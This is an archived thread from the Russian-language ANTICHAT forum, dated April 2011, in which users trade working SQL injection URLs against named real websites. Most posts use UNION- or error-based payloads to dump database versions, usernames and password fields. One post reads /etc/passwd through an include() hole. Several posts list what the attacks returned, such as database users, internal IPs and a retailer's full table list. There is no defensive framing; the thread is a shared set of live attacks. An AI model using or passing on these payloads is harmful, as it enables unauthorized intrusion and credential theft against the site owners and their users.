ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.04.2011, 15:54
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Колонка 3 попадает в функцию include()
http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,'../../../../../etc/passwd'--+
магия активирована, поэтому захексим
http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e 2f6574632f706173737764--+
|
|
|
13.04.2011, 06:14
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340
Репутация:
0
|
|
http://aalborgstift.dk/pdb/pview.php?id=-705+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user Id,userName,password),9,10,11+from+user+--+
PR3
|
|
|
|
13.04.2011, 12:46
|
|
Познающий
Регистрация: 15.11.2008
Сообщений: 41
Провел на форуме:
350553
Репутация:
19
|
|
http://www.elephant.se/search.php?q=%22%20and%201=2%20union%20select%20CO NCAT(user(),0x3a,version())/*%20and%20char(124)%20user%20char(124)=0%22%20and% 20%22x%22=%22x
|
|
|
|
14.04.2011, 05:07
|
|
Участник форума
Регистрация: 06.10.2008
Сообщений: 165
Провел на форуме:
355997
Репутация:
66
|
|
Код:
Code:
http://www.master-naba.com/page.php?contentId=-377+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--
username: master_naba_com@85.235.130.54
version: 5.0.45-log
database: master_naba_com
Google PR: 5 |
|
|
|
14.04.2011, 14:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Вариант вывода error-based SQLi
Сообщение от None
http://www.praguesociety.org/pastevent.php?eid=(select+min(@:=1)from+(select+1+ union+select+2)k+group+by+concat(version(),@:=@-1))--+
http://www.decoecho.pl/site/gallery_authors.php?region=1&lang=1&autorid=(selec t+min(@:=1)from+(select+1+union+select+2)k+group+b y+concat(version(),0x0,@:=@-1))--+
http://www.matrizenergetica.com.ar/noticias.php?pageNum_rsNoticias=0&totalRows_rsNoti cias=20¬icia_categoriaID=10&autorID=(select+min (@:=1)from+information_schema.tables+group+by+conc at(version(),@:=@-1))--+
http://isafran.com/irina/libros/isafran_resultado_escritores.php?autorid=(select+m in(@:=1)from+user+group+by+concat(user(),0x3a,vers ion(),@:=@-1))--+
http://thedivinemercy.org/news/event.php?EID=(select+min(@:=1)from+mysql.user+gro up+by+concat(user,0x3a,password,0x0,@:=@-1))--+
http://www.hurlinghampolo.com/polo_news.php?nid=(select+min(@:=1)from+users+grou p+by+(select+concat(username,0x3a,password,0x0,@:= @-1)from+users+limit+0,1))--+
|
|
|
|
14.04.2011, 19:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
ViewSonic ®
Код:
Code:
http://www.viewsonic.com.au/kbase/article.php?id=-128+union+select+1,group_concat%28CHAR%2832,58,32%29%20,username,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+vsau.internal_users%20--
IP: 60.248.78.41 //Тайвань
user: web@localhost
database: vsau
tables
Код:
Code:
activity_log, auction_items, crt_displays, dist_info, ecard_categories, ecard_templates, enews, enews_clicks, eregtmp, finch_prize, finch_redeem, finch_sales_results, internal_groups, internal_users, kbase, lcd_displays, map_state, meta_specs, mktg_assets, model_prices, name_to_id, name_to_models, online_service, order_items, pr, product_info, product_reviews, programs, projectors, res_accounts, res_goods_io, res_inventory, res_level_history, res_sales_info, resellers, resinv_format, ressales_import_log, retained_values, user_info, vote, wareg, web_orders, web_promos
|
|
|
|
15.04.2011, 01:25
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
Код:
Code:
http://www.wesleyan.edu.ph/media.php?id=-17+union+select+version(),2,3,concat(user(),0x3a,database())--
version: 5.0.91-community |
|
|
|
15.04.2011, 20:40
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340
Репутация:
0
|
|
http://buddie.me/music.php?id=-113482+union+select+1,concat_ws(0x3a,name,password ),3,4+from+users+--+
|
|
|
|
16.04.2011, 10:33
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
http://www.sirius.perm.ru/cat.php?part=-7%20and%201=2%20union%20select%201,concat_ws(char( 58),@@version,user(),database())+--
5.0.32-Debian_7etch1 sirius@hosting3.ccl.ru dbsirius_1
|
|
|
|
16.04.2011, 11:06
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340
Репутация:
0
|
|
http://oldtownrestaurant.co.uk/food.php?id=-1+union+select+1,concat_ws(0x3a,USER(),DATABASE(), VERSION()),3,4+--+
oldtown_sql@localhost: oldtown_sql:5.0.92-community
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
